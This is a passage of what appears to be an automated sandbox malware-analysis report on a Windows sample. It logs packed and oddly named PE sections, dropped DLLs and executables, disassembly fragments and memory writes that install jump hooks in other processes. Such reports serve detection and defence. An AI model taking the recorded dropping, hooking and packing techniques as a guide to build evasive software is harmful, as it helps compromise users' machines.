Source: Binary string: msvcr71.pdb0 source: MiniThunderPlatform.exe, 0000000E.00000002.1620716630.000000007C361000.00000040.00000001.01000000.00000012.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1726145069.000000007C361000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, dl_peer_id.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.7.dr
Source: Binary string: e:\code_svn\xl_framework\xl_component\minizip\Release\minizip.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.dr
Source: Binary string: cp71.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, msvcp71.dll.7.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\concrt140.i386.pdbGCTL source: concrt140.dll.7.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, dl_peer_id.dll.7.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.7.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source: Binary string: msvcr71.pdb source: MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000E.00000002.1620716630.000000007C361000.00000040.00000001.01000000.00000012.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1726145069.000000007C361000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.7.dr
Source: vcruntime140.dll.7.drStatic PE information: 0x7EDF1B0D [Sun Jun 14 00:04:29 2037 UTC]
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00437770 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ,14_2_00437770
Source: initial sampleStatic PE information: section where entry point is pointing to: dVek
Source: VZ7xFmeuPX.exeStatic PE information: section name: Cqe3k
Source: VZ7xFmeuPX.exeStatic PE information: section name: QnWKdM
Source: VZ7xFmeuPX.exeStatic PE information: section name: kqUPd
Source: VZ7xFmeuPX.exeStatic PE information: section name: h4ls
Source: VZ7xFmeuPX.exeStatic PE information: section name: M1RF
Source: VZ7xFmeuPX.exeStatic PE information: section name: dVek
Source: VZ7xFmeuPX.exeStatic PE information: section name: 7pxja
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: mWevv
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: 54Faht
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: lATry
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: VCXJ
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: 3mVe
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: aHRy
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe.5.drStatic PE information: section name: A2p9f
Source: ExuiKrnln_Win64.lib.5.drStatic PE information: section name: _RDATA
Source: AntiCheat.dll.7.drStatic PE information: section name: .C
Source: AntiCheat.dll.7.drStatic PE information: section name: .(
Source: AntiCheat.dll.7.drStatic PE information: section name: .!
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C718CC6 push 7C844287h; mov dword ptr [esp], edi7_3_6C718D00
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6A0981 push 65037118h; mov dword ptr [esp], ebx7_3_6C6A09B7
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C714505 push 312A4696h; mov dword ptr [esp], eax7_3_6C78EEC0
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C6EA3C4 push edx; mov dword ptr [esp], edx7_3_6C777EAF
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C75FD52 push 65AC799Fh; mov dword ptr [esp], ebp7_3_6C75FD57
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C833639 push D7124F30h; mov dword ptr [esp], ebx7_3_6C83369F
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C71936C push 99288AAEh; mov dword ptr [esp], ebx7_3_6C76D18C
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90718A push ebp; iretd 14_3_0C90718B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A5C2 push edx; iretd 14_3_0C90A5C3
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A0CA push ebp; retn 0029h14_3_0C90A0CB
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A5F2 push esp; iretd 14_3_0C90A5F3
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C904557 push ebp; iretd 14_3_0C90457B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C905558 push edx; iretd 14_3_0C90555B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90555F push esi; iretd 14_3_0C90557B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A860 push es; iretd 14_3_0C90A863
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FD7F5 push esp; iretd 14_3_0C8FD803
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FD7F5 push esp; iretd 14_3_0C8FD803
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FD7F5 push esp; iretd 14_3_0C8FD803
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FEE02 push edx; retn 0032h14_3_0C8FEE03
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FEE02 push edx; retn 0032h14_3_0C8FEE03
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FD640 pushfd ; iretd 14_3_0C8FD643
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FD640 pushfd ; iretd 14_3_0C8FD643
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C8FD640 pushfd ; iretd 14_3_0C8FD643
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90718A push ebp; iretd 14_3_0C90718B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A5C2 push edx; iretd 14_3_0C90A5C3
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A0CA push ebp; retn 0029h14_3_0C90A0CB
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A5F2 push esp; iretd 14_3_0C90A5F3
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C904557 push ebp; iretd 14_3_0C90457B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C905558 push edx; iretd 14_3_0C90555B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90555F push esi; iretd 14_3_0C90557B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_3_0C90A860 push es; iretd 14_3_0C90A863
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\zlibwapi.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeFile created: C:\Users\user\Desktop\ExuiKrnln_Win64.libJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\AntiCheat.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\concrt140.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\msvcp140_codecvt_ids.dllJump to dropped file
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeFile created: C:\Users\user\Desktop\ExuiKrnln_Win32.libJump to dropped file
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeFile created: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\AppData\Local\Temp\download\minizip.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeFile created: C:\Users\user\Desktop\msvcp140_atomic_wait.dllJump to dropped file
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeFile created: C:\Users\user\Desktop\ExuiKrnln_Win32.libJump to dropped file
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeFile created: C:\Users\user\Desktop\ExuiKrnln_Win64.libJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10059650 CreateEventA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,GetTickCount,GetPrivateProfileIntA,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,14_2_10059650
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10059650 CreateEventA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,GetTickCount,GetPrivateProfileIntA,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,GetPrivateProfileIntA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,15_2_10059650

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 3F80005 value: E9 2B BA 6B 73 Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 7763BA30 value: E9 DA 45 94 8C Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 3FA0008 value: E9 8B 8E 6E 73 Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 77688E90 value: E9 80 71 91 8C Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 3FC0005 value: E9 8B 4D 0A 73 Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 77064D90 value: E9 7A B2 F5 8C Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 3FD0005 value: E9 EB EB 0A 73 Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 7707EBF0 value: E9 1A 14 F5 8C Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 3FE0005 value: E9 8B 8A 5E 71 Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 755C8A90 value: E9 7A 75 A1 8E Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 3FF0005 value: E9 2B 02 60 71 Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeMemory written: PID: 7288 base: 755F0230 value: E9 DA FD 9F 8E Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 3E60005 value: E9 2B BA 7D 73 Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 7763BA30 value: E9 DA 45 82 8C Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 3FC0008 value: E9 8B 8E 6C 73 Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 77688E90 value: E9 80 71 93 8C Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 41C0005 value: E9 8B 4D EA 72 Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 77064D90 value: E9 7A B2 15 8D Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 41D0005 value: E9 EB EB EA 72 Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 7707EBF0 value: E9 1A 14 15 8D Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 41E0005 value: E9 8B 8A 3E 71 Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 755C8A90 value: E9 7A 75 C1 8E Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 41F0005 value: E9 2B 02 40 71 Jump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeMemory written: PID: 7512 base: 755F0230 value: E9 DA FD BF 8E Jump to behavior
Source: C:\Users\user\Desktop\VZ7xFmeuPX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
